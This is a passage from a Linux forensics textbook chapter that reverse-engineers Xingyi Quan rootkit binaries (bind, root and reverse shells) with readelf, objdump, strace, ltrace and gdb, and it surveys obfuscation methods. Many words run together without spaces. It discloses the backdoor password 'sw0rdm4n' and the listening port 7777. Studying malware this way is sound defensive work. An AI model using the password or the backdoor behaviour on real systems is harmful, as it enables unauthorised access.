.note.gnu.build-id UniqueIDthatissamefordebugandstrippedprograms(displayedbyfile)
.gnu.hash Describesahashtable(don’tworryifyoudon’tknowwhatthisis)
.dynsym Symboltablefordynamiclinking
.dynstr Stringsthatarerequiredfordynamiclinking
.gnu.version SymbolVersionTablethatcorrespondsto.dynsym
.gnu.version_r Requiredsymbolversiondefinitions
.rela.dyn Relocationinformationfor.dynamic
.rela.plt Relocationinformationfor.plt
.init Initializationcodeforthisprogram
.plt ProcedureLinkageTable
.text Theactualexecutablecode(machinecode)
.fini Terminationcodeforthisprogram
.rodata Read-onlydata
.eh_frame_hdr ExceptionhandlingC++codeforaccessing.eh_frame
.eh_frame Exceptionhandling(exceptionsareusedforerrorprocessing)
.init_array Listofinitializationcodetocallonstartup
.fini_array Listofterminationcodetocallontermination
.jcr InformationtoregistercompiledJavaclasses
.dynamic Dynamiclinkinginformation
.got GlobalOffsetTable(usedforaddressresolutionduringrelocation)
.got.plt GlobalOffsetTable(usedforaddressresolutionduringrelocation)
.data Initializeddata
.bss Unitializeddata
.comment Comment(normallyforversioncontrol)
.shstrtab Sectionnames(sectionheaderstringtable)
.symtab SymbolTable
.strtab SymbolTableentrynames
Donotbeoverlyconcernedifyoudon’tunderstandalltheofthesectionsdescribedinTable 10.2. I would posit that the majority of professional programmers do not knowaboutalloftheseeither.Themostimportonesforourpurposesare.text,.data,and.bss,whichcontainprogramcode,initializeddata,anduninitializeddata,respectively.Thefactthatourfilehasall thesesectionssuggeststhat theprogramwaswritteninC,orsimilarlanguage,andcompiledwithGCC(theGNUCompilerCollection).Intheory,thisshouldmakeiteasiertoreverseengineerthanhandcraftedAssemblycode.
The command readelf –program-headers <file> is used to parse theProgramHeaderTable(PHT).Theresultsofrunningthiscommandonxingyi_bindshellareshowninFigure10.12.Ascanbeseenfromthefigure,mostsegmentsconsistofalistofsections.Notableexceptionstothisaresegments00and07whichcontaintheProgramHeaderTable and stack, respectively.Thedescriptionof eachof these segments canbefound inTable10.3.ThePHTalso specifieswhere each segment shouldbe loadedandwhatbyte-alignmentitrequires.
FIGURE10.12
ProgramHeaderTableforxingyi_bindshell.
Table10.3.Segmentsfromxingyi_bindshell.
NumberandType Description
00–PHDR ProgramHeaderTable
01–INTERP Dynamiclinkertouse(/lib64/ld-linux-x86-64.so.2)
02–LOAD Portionoffiletoloadintomemory(firstone)
03–LOAD Portionoffiletoloadintomemory(secondone)
04–DYNAMIC Dynamiclinkinginformation
05–NOTE Extrainformation
06-GNU_EH_FRAME Exceptionhandlinginformation
07–GNU_STACK Theprogramstack
08–GNU_RELRO Memorythatshouldberead-onlyafterrelocationisdone
If a file has not been stripped,readelf can be used to list symbols. Partial outputfrom runningreadelf–symbols-Wxingyi_bindshell is shown in Figure10.13.Notice that thisoutput ismoreverbose than thatproducedbynm. It is alsoabit
moreorderly.
FIGURE10.13
Partialoutputfromrunningreadelf–symbolsagainstxingyi_bindshell.
Eachof thesectionsmaybedisplayedusingthecommandreadelf–hex-dump=<number or name> <file>. This can help you get some insight into the filewithout having to decipher the different metadata structures yourself. Running thiscommandforafewofthesectionsinxingyi_bindshellisshowninFigure10.14.Fromthefigure,we can see the program was compiled with GCC version 4.8.2-19 for Ubuntu,should be loaded with /lib64/ld-linux-x86-64.so.2, and has the SHA Build ID of12c43054c53c2e67b668eb566ed7cdb747d9dfda.It isprobablybest toavoidrunningthiscommand on sections containing code as these will not be displayed in a meaningfulmanner.Inthenextsection,wewillcoverabettertoolforexaminingexecutablecode.
FIGURE10.14
Dumpingafewsectionsfromxingyi_bindshellwithreadelf–hex-dump.
UsingobjdumptodisassemblecodeTheobjdump utility can be used to get information from an object file.Much of itsfunctionalityduplicates thatofreadelf.Oneuseful featurenot found inreadelf istheabilitytodisassembleobjectcode(convertitfrompuremachinecodetomorehuman-readableAssembly).TherearetwocommonformatsforAssemblycode:IntelandAT&T.ThedefaultistouseAT&Tsyntax,butthiscanbechangedusingthe“-Mintel”option.TheIntelformatseemstobepreferredbyPCprogrammers.Itisimportanttorealizethatdisassembly with a tool like this is not perfect, as any data in the sections normallycontainingcodewillbeinterpretedasmachinecodeinstructions.
Thecommandobjdump–disassemble-Mintelxingyi_bindshellwilldisassemblethesectionsofthefilenormallyexpectedtocontaincode.PartialresultsfromrunningthiscommandareshowninFigure10.15.Thesnippetshownispartofthemainmethodoftheprogram.WhileacompleteAssemblytutorialiswelloutofscopeforthisbook,an introduction to thebasicscanbehelpful inunderstanding thiscode.Assumingthecodehasnotbeenintentionallyobfuscated,onlyabasicunderstandingofAssemblyisrequiredtogetthegistofwhatisgoingon.
Assemblylanguageinstructionsareprettybasic.Theymostlyconsistofmovingthingsaround; simplemath like addition, subtraction, andmultiplication; comparing numbers;jumpingtonewmemoryaddresses;andcallingfunctions.Forcommandsthatmovethingsaround,thesourceandtargetcanbememorylocationsorhigh-speedstorageareasintheCPUcalledregisters.
Some of these registers have a special purpose, and the rest are used for performingcalculations or passing variables to functions. Some of the registers have been aroundsince the 16-bit processors of old (8086, 80286), others were added when 32-bitprocessorswere released (80386 and newer),while still otherswere addedwhenAMDreleasedthefirst64-bitprocessors.Standard64-bitprocessorregistersareshowninFigure10.16.Thelegacyregistersarenamedbasedonwidth.XX,EXX,andRXXdenote16-bit,32-bit,and64-bitwideregisters,respectively.Some16-bitregisterscanbefurtherdividedintoXHandXLfor thehighand lowbytes, respectively.Using theRAXregisterasanexampleAL,AX,EAX,andRAXrepresentthelowestbyte,twobytes,fourbytes,andalleightbytesoftheregister,respectively.WhenviewingAssemblycode,youwilloftenseedifferentwidthregistersusedbasedonneed.
TheRIP (or EIP for 32-bitAssembly) register is known as the instruction pointer. Itpoints to theaddress inmemorywhere thenext instruction toberuncanbefound.TheRFLAGS register is used to keep track of status of comparisons, whether or not amathematicaloperationresultedinaneedtocarryabit,etc.TheRBPregisterisknownasthebasepointer,and itpoints to thebase (bottom)of thecurrent stack frame.TheRSPregisteriscalledthestackpointer,anditpointstothetopofthecurrentstackframe.Sowhatisastackframe?
A stack frame is a piece of the stackwhich is associatedwith the currently runningfunctioninaprogram.So,whatthenisastack?ThestackisaspecialmemoryareathatgrowseachtimeanewfunctioniscalledviatheAssemblyCALLinstructionandshrinkswhenthisfunctioncompletes.InCandsimilarlanguagesyouwillhearpeopletalkaboutstack variables that are automatically createdwhendeclared andgo away at the endoftheircodeblock.Thesevariablesareallocatedonthestack.Whenyouthinkaboutwhatafunctionis, it isalwaysacodeblockofsometype.Thelocalvariablesforfunctionsaretypicallyallocatedonthestack.
Whenlargeramountsofstoragearerequiredorvariablesneedtolivebeyondasinglefunction, variablesmay be created on the heap. Themechanism for getting heap spacediffersfromoneprogramminglanguagetothenext.Ifyoulookattheinternalsofhowtheoperating system itself creates heaps and doles out memory to various processes, it isactuallyquitecomplex.
When reverse engineering applications in order to find vulnerabilities, the stack andheapplayacentralroleintheprocess.Forourpurposesitissufficienttounderstandthatthestackisthemostcommonplaceforfunctionstostoretheirlocalvariables.IfyoulookbackatFigure10.15,youwillseethatthefirstinstruction,pushrbp,isusedtosavethecurrentbasepointer(bottomofthestackframe)tothestack.Thecurrentstackpointeristhenmovedtothebasepointerwiththecommandmovrbp,rsp,(recallthatthetargetisontheleftandsourceontherightinIntelnotation).OnthenextlinethecurrentvaluestoredinRBXissavedbypushingitontothestack.Onthenextline0x88issubtractedfromthestackpointerwiththeinstructionsubrsp,0x88.
FIGURE10.15
Partialresultsfromdisassemblingxingyi_bindshellwithobjdump.
Youmightbethinking,“Holdonasecond,whydidIsubtracttogrowthestack?”Thereason for this is that the stack grows downward (from highmemory addresses to lowmemoryaddresses).Bymovingtheoldstackpointer(inRSP)tothebasepointer(RBP),the old top of the stack frame has become the new bottom. Subtracting 0x88 from thestackpointerallocates0x88bytesforthecurrentstackframe.Thisnewstorageisusedbythecurrentfunction.IfyoulookatFigure10.15,youwillseeseveralmovinstructionsthatmovevaluesintothisnewlyallocatedstackbuffer.Thedestinationsforallofthesemovesarememoryaddressescontained in thesquarebrackets,whichareallof theform[rbp-<someoffset>].
There is also an odd instruction,xoreax,eax, among themove instructions. Thebitwise exclusive-OR (XOR) operator compares each bit in two numbers, and thecorrespondingbitintheresultis1ifeither,butnotboth,oftheinputvalueshada1inthatposition.TheeffectofXORinganynumberwithitselfisthesameassettingthatnumbertozero.Therefore,xoreax,eax is the sameasmoveax,0x0. Readerswho havedone any shell coding will realize that use of XOR is preferred in that situation as itpreventsazerobyte(whichisinterpretedasaNULLinmanycases)frombeingpresentincodeyouaretryingtoinject.
Following the block of move instructions we see a call instruction. In high levellanguagescallingafunctionandpassinginabunchofparametersisprettysimple.HowdoesthisworkinAssembly?Thereneedstobeacallingconventioninplacethatdictateshow parameters are passed into and out of a function. For various technical reasons,multiple callingconventionsareusedbasedon the typeof functionbeingcalled.32-bitsystems normally pass in parameters on the stack (ordered from right to left). 64-bit
systemsnormallypassinparametersintheregistersRDI,RSI,RDX,RCX,R8,R9,andplaceanyadditionalparametersonthestack(alsoorderedrighttoleft).ReturnvaluesarestoredininEAX/EDXandRAX/RDXfor32-bitand64-bitsystems,respectively.Oneofthe reasons that there are multiple calling conventions is that some functions (such asprintf in C) can take a variable number of arguments. In addition to specifying whereparametersare stored,acallconventiondefineswho is responsible (callerorcallee) forreturningthestackandCPUregisterstotheirpreviousstatejustbeforethefunctionwascalled.
Armedwiththeknowledgefromthepreviousparagraph,wecanseethetwolines,movedi,0x100 andcall<n_malloc> are used to call the n_malloc function with asingle parameter whose value is 0x100 (256). The return value, a pointer to memoryallocatedontheheap,isthenstoredonthestackframeonthenextline,movQWORDPTR[rbp-0x58],rax.Onthelinesthatfollow,theputcharandpopenfunctionsarecalled.
The return value from the call to popen is stored in the stack frameon the linemovQWORDPTR[rbp-0x70],rax.Thenextlinecomparesthereturnvaluewithzero.Ifthe return valuewas zero, the lineje400fe7<main+0xbc> causes execution tojump to0x400FE7.Otherwise, execution continueson thenext line at 0x400FB2.Notethatthemachinecodeis0x740x35.Thisisknownasashortconditionaljumpinstruction(opcode is0x74), that tells thecomputer to jumpforward0x35bytes if thecondition ismet.Objdumpdidthemathforyou(0x400FB2+0x35=0x400FE7),andalsotoldyouthislocationwas0xBCbytesfromthestartofthemainfunction.Thereareotherkindsofjumpsavailable,fordifferentconditionsornoconditionatall,andforlongerdistances.
Otherthanthereturninstruction,ret,thereisonlyoneremainingAssemblyinstructionfoundinthemainfunctionthathasnotyetbeendiscussed.Thisinstructionisnotinthesnippet from Figure 10.15. This instruction is lea, which stands for Load EffectiveAddress.Thisinstructionperformswhatevercalculationsyoupassitandstorestheresultsinaregister.Thereareafewdifferencesbetweenthisinstructionandmostoftheothers.First, you may have more than two operands. Second, if some of the operands areregisters,theirvaluesarenotchangedduringtheoperation.Third,theresultcanbestoredinanyregister,includingregistersnotusedasoperands.Forexample,learax,[rbp-0x50]willloadthevalueofthebasepointerminus0x50(80)intheRAXregister.
FIGURE10.16
Registersformodern64-bitprocessors.
TheendofthedisassemblyofthemainfunctionbyobjdumpisshowninFigure10.17.The highlighted lines are cleanup code used to return the stack and registers to theirprevious state. Notice that we add back the 0x88 that was subtracted fromRSP at thebeginningofthefunction,andthenpopRBXandRBPoffthestackinthereverseorderfromhow theywere pushedon.Note that in the calling convention usedhere, it is thecallee(mainfunctioninthiscase)thatisresponsibleforrestoringregistersandthestacktotheirpreviousstate.Functions(suchasprintf)thatacceptavariablenumberofparameters,requireadifferentcallingconvention,inwhichthecallermustperformthecleanup,asthecalleedoesnotknowwhatwillbepassedintothefunction.
FIGURE10.17
Cleanupcodeattheendofthemainfunction.Notethatthelinesaftertheretinstructionareprobablydata,notinstructionsasdepicted.
The bytes after the return instruction have been misinterpreted as machine codeinstructionsbyobjdump.LaterwhenweusetheGNUDebugger(gdb) todisassembletheprogram, all of theprogramwill bedisassembledproperly.For this reason,wewilldelayprovidingthefulloutputfromobjdumphere.
Up to this point we have been discussing what is known as static analysis. This isessentially dead analysis of a program that is not running. While using a tool likeobjdump todisassembleaprogrammight lead tosomeminorerrors, it issafebecausetheprogram is never executedonyour forensicsworkstation.Often this is sufficient, ifyourprimarygoalistodetermineifafileismaliciousorbenign.Youcertainlycoulduseatoolsuchasgdb togetamoreaccuratedisassemblyofanunknownexecutable,butbecarefulnottoruntheprograminthedebuggeronyourforensicsworkstation!
DYNAMICANALYSISDynamic analysis involves actually running a program to seewhat it does.There are anumberoftoolsthatyoucanusetoanalyzeanunknownprogram’sbehavior.Beforeweproceed,weneedtotalkaboutsafety.Thinkaboutit.Doesrunninganunknown,possiblymaliciousprogramonyourforensicsworkstationsoundlikeagoodidea?Youhavetwobasic choices. Either you can use some spare hardware that is disconnected from thenetworkandonlyusedforexaminingunknownfiles,oryoucansetupavirtualmachineusingVirtualBox,VMWare,orothervirtualizationsoftware.
The separate machine is the safest option. This allows you to run the programwith
recklessabandon,knowing thatyouwill re-image themachinewhenyouaredonewithyour analysis.Virtualization is definitelymore convenient, but there is potential risk toyourhostmachine ifyoumisconfigure thevirtualmachine. Ifyoudousevirtualization,makesure thatyouhavenonetworkconnections to thevirtualmachine.Also,beawarethatsomesmartmalwarewilldetectthatitisbeingruninsideavirtualmachineandrefuseto run or, even worse, attempt to exploit possible vulnerabilities in the virtualizationsoftwaretoattackthehostmachine.
If you need an image for your virtualmachine, you could use a fresh install of yourfavoriteLinuxdistribution.Ifyouthinkyouwillbeinvestigatingunknownbinariesoften,youmight consider backing up the virtual disk file after you have installed all of yourtools and before transferring any unknown files to the virtualmachine.Remember thatmostvirtualizationsoftwarewillinstallaNATnetworkinterfaceouttotheInternetwhichyoushoulddisable! Ifyou reallywant toduplicate the subject system,youcancreateavirtualmachinefromthesubjectdisk image.Thisassumes thatyouhavesufficientdiskspace,RAM,etc.Thecommandtoconverttherawimagetoavirtualharddiskfile,ifyouare using VirtualBox, is vboxmanage internalcommands converthd -srcformat raw -dstformat vhd <raw image> <destination vhdfile>. ThePAS subject system running in a virtualmachine (without networking!) isshowninFigure10.18.
FIGURE10.18
RunningthePASsubjectsysteminaVMafterconvertingtherawimagetoaVHDfile.
TracingsystemcallsThestraceutilitycanbeusedtotracewhichsystemcallsarebeingmadebyaprogram.
Thisprogramworksbyrunningaprogramandkeepingtrackof(tracing)anysystemcallsthat are made. Never run this command against an unknown binary on your forensicsworkstation. Only run this inside a sandbox in a virtualmachine or on your dedicatedmachinesformalwareinvestigationdescribedabove.Inadditiontobeingcautiouswhenrunningthiscommand, thereareafewthingsthatyoushouldkeepinmind.First,whenyouruntheprogramasanyoneotherthanroot,itmightfailbecauseofpermissionissues.Second,ifcommandlineparametersarerequired,itmightfail,oratleasttakeadifferentexecution path, that can make it hard to see what it does. Third, it may require somelibrariesnot installed inyour testenvironment. If this is thecase,youshouldbeable totell,becauseyouwillseesystemcallsattemptingtoloadthelibraries.Partialoutputfromrunningstraceagainstxingyi_bindshellisshowninFigure10.19.
FIGURE10.19
Partialoutputfromrunningstraceagainstxingyi_bindshellinasandboxvirtualmachine.
FromFigure10.19wecansee that theClibrary(/lib/x86_64-linux-gnu/libc.so.6)wasopenedread-onlyandthecallreturnedafilehandleof3.Thefilewasreadandpartsofitweremappedtomemorysothatsomeofthefunctionsinthelibrarycanbeused.Twofilehandles automatically exist for all programs, 1 and 2, for standard out (stdout) andstandard error (stderr), respectively. The call towrite(1, “\n”, 1) is the same as callingprintf(“\n”) from a C program (which is exactly what this file is). The output fromstrace,alsoshowsthatapipewascreatedusingpopen.Popenstandsforpipeopen.Itisusedtoexecuteacommandandthenopenapipetogettheresponsesfromthecommand.Fromthereadcommandthatfollowsafewlineslater,itlooksliketheprogramistryingtodeterminetheversionofPythoninstalled.
Don’t think of strace as the perfect tool to help you understand how a programworks.Thebestwaytoseewhataprogramdoes is to trace throughitwithgdb.Using
strace is a good starting place before moving on to gdb. The results of runningstrace against anotherXingYiQuanbinary,xingyi_rootshell,withnocommand linearguments are shown inFigure 10.20.Note that the program terminatedwith a “wrongpassword” message. Rerunning this command with the “sw0rdm4n” password wediscoveredduringstaticanalysisleadstotheresultsshowninFigure10.21.
FIGURE10.20
Runningstraceagainstxingyi_rootshellwithoutapassword.
FIGURE10.21
Runningstraceagainstxingyi_rootshellwiththecorrectpasswordsupplied.
Ifwerunstraceagainstxingyi_reverse_shell,itgeneratesanerror.IfweaddtheIPaddress 127.0.0.1 to the command, it succeeds and creates a process listening on port7777,asshowninFigure10.22.
FIGURE10.22
Running strace against xingyi_reverse_shell 127.0.0.1. A process listening on port 7777 is created asconfirmedbyrunningnmap.
TracinglibrarycallsTheltraceutilityperformsasimilarfunctiontostrace,exceptthatitisusedtotracelibrary calls instead of system calls. The results of running ltrace againstxingyi_bindshellareshowninFigure10.23.WecanseethattheClibraryisbeingloaded,257bytesofmemoryareallocatedand thenfilledwithzeros,popen iscalled toget thePythonversion,theversionreturnedis2.7.6,strstriscalledandreturnszero,forkisusedtocreateanewprocess,andtheprogramexits.
FIGURE10.23
Runningltraceagainstxingyi_bindshell.
The results of running ltrace against xingyi_rootshell with the correct passwordsuppliedareshowninFigure10.24.WecanseethattheClibraryisloaded,18bytesofmemoryareallocatedandthensettozero,upto16charactersofastringarestoredinastringbuffer(probablythepasswordpassedin,butweneedtotracetheprogramwithgdbto verify this), a string is compared to “sw0rdm4n” and found to be identical, a filedescriptorisduplicated,andabashshelliscreatedusingtheCsystemfunction.
FIGURE10.24
Runningltracesagainstxingyi_rootshellwiththecorrectpasswordsupplied.
The results of runningltrace against xingyi_reverse_shell 127.0.0.1 are shown inFigure 10.25. We can see the C library is loaded, the string length of “127.0.0.1” ischecked repeatedly, fork is called creating process 3116, and twowarnings are printedbeforetheprogramexitswhenControl-Cispressed.Anewprocesslisteningonport7777hasbeencreated.
FIGURE10.25
At this point we have enough information about these binaries to say that they aremalicious.We know that they create listening sockets, shells, and have other commonmalwaretraits.Ifwewanttolearnmore,itistimetouseadebugger.
UsingtheGNUDebuggerforreverseengineeringThe GNU debugger,gdb, is the standard debugger for Linux programmers. It is verypowerful.Unfortunately, all this power comeswith a bit of a learning curve.There aresomeGraphicalUser Interface (GUI) front ends togdb, but the tool is command linebased.Iwillonlyhitthehighlightsinthisbook.Forafullcourseonhowtogetthemostfrom gdb, I recommend the GNU Debugger Megaprimer at PentesterAcademy.com(http://www.pentesteracademy.com/course?id=4).
Beforewegetstarted,IfeelthatIshouldpointoutthatgdbwasnotdesignedtobeusedforreverseengineering.Thereareotherdebuggerstailormadeforreverseengineering.Ofthese,IDAProisperhapsthemostpopular.WithpricingthatstartsinexcessofUS$1100,IDAProisnotforthecasualreverseengineer,however.
Toloadaprogramintogdb,simplytypegdb<executable>.Youshouldseesomemessages about your file, concerning whether or not it contained debugging symbols(mostfilesyouexaminelikelylacktheextradebugginginformation),astatementthatsaystotype“help”togethelp,andthena(gdb)prompt.TypinghelpleadstothescreenshowninFigure10.26.
FIGURE10.26
Thegdbmainhelpscreen.
Ifyoutypehelpinfoingdb,youwillgetalonglistofthingsthatthedebuggerwillreport on. One of these items is functions. Running info functions withxingyi_bindshellloadedinthedebuggerproducesalonglist,someofwhichisshowninFigure 10.27. Functions are displayed along with their addresses. Incidentally, gdbcommands can be abbreviated as long as they are not ambiguous. Typing inf funwouldhavereturnedthesameresults.
FIGURE10.27
Partialresultsfromrunninginfofunctionsingdb.
Asmentionedpreviously,gdbcanbeusedtodisassembleaprogram.Thecommandfordisassemblingafunctionisjustdisassemble<functionnameoraddress>,i.e.disassemblemain.Thecommandcanbeshortened todisas.Before runningthis command, you might wish to switch from the default AT&T syntax to the morecommon Intel syntax. To do so, issue the command set disassembly-flavorintel. Partial results from disassemblingmain are shown in Figure 10.28. Note that,unlike the output from objdump shown in Figure 10.15, the main function ends at0x401312.
FIGURE10.28
Partialresultsfromdisassemblingmainingdb.
If,afterviewingthedisassemblyofvariousfunctions,youdecidetoruntheprogram(inyour sandbox!), you may wish to set at least one breakpoint. The command to set abreakpoint is simply break <address or function name>. If you supply afunctionname,thebreakpointissetatthebeginningofthefunction.Thecommandinfobreak lists breakpoints. To delete a breakpoint type delete <breakpointnumber>.Therun commandwill start theprogramand runeverythingup to the firstbreakpoint (if it exists). Typingdisassemble with no name or address after it willdisassembleafewlinesafterthecurrentexecutionpoint.ThesecommandsareillustratedinFigure10.29.
FIGURE10.29
Breakpointmanagementcommands.
Ifyouarestoppedatabreakpoint,youcantakeoffrunningagaintothenextbreakpoint,if any, with continue. You may also use stepi and nexti to execute the nextAssemblyinstructionandexecutethenextAssemblyinstructionwhilesteppingoveranyfunctions encountered, respectively.When stepping through aprogram,you can just hitthe<enter>key,asthiscausesgdbtorepeatthelastcommand.TheuseofthesesteppingfunctionsisdemonstratedinFigure10.30.
FIGURE10.30
Usingsteppingfunctionsingdb.
Asyouaretracingthroughaprogram,youmightwanttoexaminedifferentchunksofmemory (especially the stack)andvarious registers.Thex (examine) command is usedforthispurpose.Thehelpforxandthefirsttwentygiantvalues(8bytes)onthestackinhexadecimal (gdb command x/20xg $rsp) are shown in Figure 10.31. Note thatbecausethestackgrowsdownward,itismucheasiertodisplayinthedebugger.
FIGURE10.31
Usingtheexaminecommandingdb.
Thecommandinforegistersdisplayalltheregisters,asshowninFigure10.32.Note that if you are running a 32-bit executable, the registerswill be namedEXX, notRXX,asdescribedearlierinthischapter.Forreverseengineering,theRBP,RSP,andRIP(base,stack,andinstructionpointers,respectively)arethemostimportant.
FIGURE10.32
Examiningregistersingdb.
Let’sturnourfocustoxingyi_rootshell,nowthatwehavelearnedsomeofthebasicsofusinggdb.First.weloadtheprogramwithgdbxingyi_rootshell.Next,wesetabreakpointatthestartofmainbytypingbreakmain.IfyoupreferIntelsyntax,issuethe command set disassembly-flavor intel. To run the program withcommand line argument(s), append the argument(s) to the run command, i.e. runsw0rdm4n.ThissequenceofinstructionsisshowninFigure10.33.
FIGURE10.33
Runningxingyi_rootshellingdb.
Runningdisassemble results in the disassemblyof the current function, completewithapointertothenextinstructiontobeexecuted.ThedisassemblyofmainisshowninFigure10.34.Thereareafewthingsthatarereadilyapparentinthissnippet.Thirty-twobytes (0x20) of space are allocated on the stack for local variables. Memory is thenallocatedontheheapwithacallton_malloc.Twoaddresses(onefromthestackandoneinsidetheprogram)areloadedintoRAXandRDX,andthenstrcmpisusedtocomparethetwostringsstoredattheselocations.Ofsignificancehereisthatthissnippetmakesitclearthisembeddedstringissomesortofpassword.
FIGURE10.34
Disassemblyofthexingyi_rootshellmainfunction.
Ifwedidnot yet realize that this embeddedvaluewas apassword,we coulduse thecommandx/s*0x6010d0 to display this password as shown in Figure 10.35.Notethatthisisextraeasybecausethebinarywasnotstrippedandhadadescriptivenameforthisvariable.Evenifitwasstripped,thefactthatanaddressisreferencedtoRIPindicatesavariablethatisembeddedintheprogrambinary.Weseetheargumenttothesystemcallisloadedfromaddress0x400B9C.Ifweexaminethiswithx/s0x400b9c,weseethatabashshellisbeingstarted.
FIGURE10.35
Usinggdbtodeterminetheprogrampasswordandtargetofsystemcall.
Whataboutthexingyi_reverse_shell?Wecandoaquickanalysisbyfollowingthesameprocedure.First,weloaditingdbwithgdbxingyi_reverse_shell.Next,weseta breakpoint inmainwithbreakmain.Optionally,we set the disassembly flavor toIntel with set disassembly-flavor intel. We can run the program with aparameter usingrun127.0.0.1. At this stage, the program should be stopped justinsideofthemainfunctionandtypingdisassemblewillproducetheoutputshowninFigure10.36.
FIGURE10.36
Disassemblingmainfromxingyi_reverse_shellingdb.
BreakingdownthedisassemblyinFigure10.36,wecanseethatthisfunctionisfairlysimple. Thirty-two (0x20) bytes of space are allocated on the stack. The number ofcommandlineparametersandthefirstparameterarestoredin[RBP–0x14]and[RBP–0x20], respectively. If the number of command line parameters is greater than1 (recallthat the program name is counted here), then we jump over the line call<_print_usage>.Theaddressof the secondcommand lineargument (locatedat thestartofthislist+0x8toskipthe8-bytepointerforthefirstargument)isloadedintoRDIand validate_ipv4_octet is called. If we did not already know that this command lineparameterwassupposedtobeanIPaddress,thiscodesnippetwouldhelpusfigureitout.Again,ifthebinarywasstripped,wewouldneedtoworkalittleharderandinvestigatethefunctionat0x400AC5tofigureoutwhat itdoes. If this functiondoesn’t returnsuccess,_print_usageiscalled.
Assumingeverythingisstillgood,thedaemonizefunctioniscalled.Onceagain,ifthebinaryhadbeenstrippedofthisdescriptivename,wewouldhavetoworkabitharderanddelve into the daemonize function to determine its purpose. We see another addressreferenced toRIP.Hereaparameter for_writepid_to_file isbeing loaded fromaddress0x6020B8. Running the command x/s *0x6020b8 reveals this string to be“/tmp/xingyi_reverse_pid”.ThisandtheremainderofthedisassemblyofmainareshowninFigure10.37.
FIGURE10.37
Secondhalfofdisassemblyofmaininxingyi_reverse_shell.
Wecanseethatfwriteiscalledacoupleoftimesandthat_log_fileisalsocalled.Ifweexamine thevalues referenced inFigure10.37,wewill see that 0x6020B0contains thevalue0x1E61(7777)and0x6020C8containsthestring“/tmp/xingyi_reverse.port”.Itwasfairlyeasytodeterminewhatthesethreebinariesdobecausetheauthormadenoattemptto obfuscate the code. The filenames, function names, variable names, etc. made thisprocess easy.What if a malware author is trying tomake things hard to detect and/orunderstand?
OBFUSCATIONThere are a number of methods malware authors will use in order to obfuscate theirprograms.The levelofsophisticationvarieswidely.Oneof themostpedestrianways toslowdownthereverseengineeristouseapacker.Apackercanbeutilizedtocompressabinaryondiskand,insomecases,speeduptheloadingprocess.Apackercompressesanexistingprogram,andtheninsertsexecutablecodetoreversetheprocessanduncompresstheprogramintomemory.
The Ultimate Packer for Executables (UPX) is a very popular cross-platform packeravailableathttp://upx.sourceforge.net. If executing thecommandgrepUPX<file>generatesanyhits,thenyoumightbedealingwithafilepackedbyUPX.Ifyougetahit,downloadtheUPXpackageanddecompressthefilewiththe-doption.ThefirstbytesinafilepackedwithUPXareshowninFigure10.38.
FIGURE10.38
ThefirstpartofafilepackedwithUPX.
Inthepastclevermalwareauthorsmighthavewrittenself-modifyingcodethatchangesas it is executed. This was quite easily done with DOS systems that had no memoryprotectionwhatsoever.Inthemodernworld,evenWindowswillmarkexecutablememoryblocksasread-only,makingthisobfuscationmethodathingofthepast.
Moderndaycompilersbenefitfromdecadesofresearchanddoagreatjobofoptimizingcode. Optimized code is also very uniform, which allows it to be more easily reverseengineered.Asa result,obfuscatedcode is likelyhandwritten inAssembly.This isbothgoodandbad.Thegood thing is thatyouhave tobea skilledAssemblycoder towritemalware this way. The bad thing is that you have to be a skilled Assembly coder tointerpret and follow the code! Again, for the purposes of incident response, if youencountercodeusing theobfuscation techniquesdiscussed in this section, it isprobablymalware. There are some paranoid companies that obfuscate their products in order todiscouragereverseengineering,butthoseproductsarefewandfarbetweenontheLinuxplatform.
Sowhat sorts of thingsmightonedo toobfuscateAssembly code?Howaboutusingobscure Assembly instructions. In this chapter, we have covered just a handful ofAssemblyinstructions.Yetthisisenoughtogetahigh-levelviewofwhatishappeninginmost programs. Start using uncommon operations, and even the experiencedAssemblycodersarerunningtoGoogleandtheirreferencemanuals.
Compilers are smart enough to replace calculations involvingonly constantswith theanswers.Forexample,ifIwanttosetaflaginposition18inabitvector,andIwritex=2^ 17 or x = 1 << 17 this will be replaced with x = 0x20000. If you see calculations
involvingonlyconstants thatareknownatcompile time,suspectobfuscation(orpoorlywrittenAssembly).
Authorsmayalsointentionallyinsertdeadcodethatisnevercalledinordertothrowthereverseengineerofftrack.IonceworkedforacompanythathadwrittentheirPCsoftwareproduct inCOBOL (yes, Iwas desperate for a jobwhen I took that one).The primaryauthoroftheirmainproducthadinsertedthousandsoflinesofCOBOLthatdidabsolutelynothing. Idiscovered thiswhenIported theprogramtoC++. Incidentally, thecompleteCOBOLlistingrequiredanentireboxofpaper.TheC++programwaslessthan200pageslong, despite running on three operating systems in graphical or console mode (oldprogramwasDOSandconsoleonly).
Authorsmightalsoinsertseverallinesofcodethatareeasilyreplacedbyasingleline.One of the techniques is to employ an intermediate variable in every calculation evenwhen this is unnecessary. Another trick is to usemathematical identities whenmakingassignments.
Oneofthefewtechniquesthatstillworkswhenprogramminginahighlevellanguageis function inlining. If you look back in this chapter, you will see that a lot of theinformationwegleaned fromour unknownbinarieswasbasedon tracing throughwhatfunctionswerecalledlocally(lookingatdisassembly),inlibraries(ltrace),andsystemcalls(strace).Inliningturnsaprogramintoonebigfunction.Theonebigfunctionwillstillhavelibraryandsystemcallsbutwillbenoticeablyhardertograsp.
SUMMARYIn thischapterwediscussedhow todetermine ifunknownfilesaremalicious.Weevencoveredthebasicsofreverseengineering.Withthischapter,wehavenowcoveredeverymajor topic in theworld ofLinux forensics. In the next chapterwewill discuss takingLinuxforensicstothenextlevel.
CHAPTER
11TheRoadAheadINFORMATIONINTHISCHAPTER:
NextstepsCommunitiesLearningmoreCongregateCertify?
NOWWHAT?You’vereadthroughthisentirebookandworkedthroughthesampleimages.Nowwhat?Theworld of information security is a big place.The subfield of forensics is also vast.While we have covered everything you need to know for a typical Linux incidentresponse,wehaveonlyscratched thesurfaceof forensicsknowledge.PerhapsyouhavedoneahandfulofrealLinuxinvestigations.Anaturalquestiontoaskis,“WheredoIgofromhere?”
COMMUNITIESDonotworkalone.Becomepartofacommunity.Ifyouwanttolimityourselfstrictlytoforensics,thisiseasiersaidthendone.Organizationsdedicatedtoforensicswithavibrantnetworkoflocalchaptersarerare.Personally,Idonotseethisasabadthing.Ithinkitisfarbetter togetplugged in to thebroader informationsecuritycommunity. Ifyou thinkaboutit,havingfriendsthatareexpertsonthingslikeoffensivesecuritycouldbehelpfultoyouinthefuture.YouwillalsofindmanydomainexpertsonLinux,Assembly,etc.inthiscommunity.
